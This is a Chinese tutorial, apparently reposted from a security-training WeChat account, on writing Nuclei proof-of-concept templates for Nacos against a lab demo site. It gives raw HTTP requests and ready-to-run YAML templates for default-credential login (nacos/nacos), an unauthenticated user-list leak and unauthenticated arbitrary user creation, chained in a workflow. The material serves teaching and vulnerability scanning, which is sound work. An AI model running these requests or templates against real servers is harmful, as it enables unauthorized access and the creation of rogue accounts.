1、Poc开发工具介绍
Nuclei:https://nuclei.projectdiscovery.io/
Cloud Platfrom云平台:https://cloud.projectdiscovery.io/
2、目标站点简介
目标演示站点:http://glkb-jqe1.aqlab.cn/nacos/#/login
指纹:Nacos
已知常用漏洞利用:Nacos弱口令 账密:nacos/nacos
Nacos 敏感信息泄露 /nacos/v1/auth/users?pageNo=1&pageSize=9
Nacos 任意用户创建:/nacos/v1/auth/users?accessToken=
3、自定义Poc
Nacos通用弱口令:
报文:
POST /nacos/v1/auth/users/login HTTP/1.1
Host: glkb-jqe1.aqlab.cn
Content-Length: 42
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://glkb-jqe1.aqlab.cn
Referer: http://glkb-jqe1.aqlab.cn/nacos/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
username=nacos&password=nacos
返回JWT
匹配规则:https://docs.projectdiscovery.io/templates/reference/matchers
提取规则:https://docs.projectdiscovery.io/templates/reference/extractors
根据响应body,提取jwt全段值或部分值均可
RE:(eyJ[A-Za-z0-9-]{10,}.[A-Za-z0-9.-]{10,}|eyJ[A-Za-z0-9/+-]{10,}.[A-Za-z0-9./+-]{10,})
效果demo:
Nacos Information敏感信息泄露
GET /nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken= HTTP/1.1
Host: glkb-jqe1.aqlab.cn
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
demo
id: Nacos-InformationForUser
info:
name: Nacos-InformationForUser
author: xxx
severity: info
description: description
reference:
- https://
tags: nacos
requests:
- raw:
- |+
GET /nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken= HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains_any(body,"username","password") && status_code==200
Nacos AuthUserBypass
POST /nacos/v1/auth/users?accessToken= HTTP/1.1
Host: glkb-jqe1.aqlab.cn
Content-Length: 25
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
username=222&password=222
demo
id: Nacos-NotAuth-AnyUserCreate
info:
name: Nacos-NotAuth-AnyUserCreate
author: xxx
severity: info
description: description
reference:
- https://
variables:
username: "{{to_lower(rand_base(6))}}"
tags: nacos
requests:
- raw:
- |-
POST /nacos/v1/auth/users?accessToken= HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 32
username={{username}}&password={{username}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains_any(body,"ok") && status_code==200
Workflow工作流
id: Nacos-Workflower
info:
name: Nacos-Workflower
author: xxx
severity: info
description: Description of the Template
workflows:
- template: pathNacos-NotAuth-AnyUserCreate.yaml
- template: pathNacos-InformationForUser.yaml
- tags: nacos
DEMO
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
<span
原文始发于微信公众号(掌控安全EDU):Nuclei Poc开发
</span
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论